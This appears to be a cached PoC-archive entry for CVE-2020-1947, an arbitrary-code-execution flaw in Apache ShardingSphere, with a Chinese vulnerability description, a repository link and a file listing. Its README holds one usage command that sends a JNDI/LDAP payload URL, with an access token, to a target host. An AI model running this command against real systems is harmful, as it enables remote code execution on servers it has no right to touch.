CVE-2020-1947 PoC — Apache ShardingSphere 代码问题漏洞

Source

https://github.com/wsfengfan/CVE-2020-1947

Associated Vulnerability

Title:Apache ShardingSphere 代码问题漏洞 (CVE-2020-1947)
Description:Apache ShardingSphere是美国阿帕奇（Apache）软件基金会的一套开源的分布式数据库中间件解决方案。 Apache ShardingSphere(incubator) 4.0.0-RC3版本和4.0.0版本中存在代码问题漏洞。攻击者可利用该漏洞在系统上执行任意代码。

Description

CVE-2020-1947 Python POC

Readme

# CVE-2020-1947

```
usage: CVE-2020-1947.py [-h] -i IP -p PORT -T ACCESS_TOKEN -poc POC

python CVE-2020-1947.py -i 192.168.128.135 -p 8088 -T eyJ1c2VybmFtZSI6ImFk******* -poc ldap://127.0.0.1:1389/CommandObject

```

File Snapshot


 [4.0K]  /data/pocs/2551f6051424634b45fc68b6ca835d09d948afa2
├── [1.6K]  CVE-2020-1947.py
└── [ 218]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!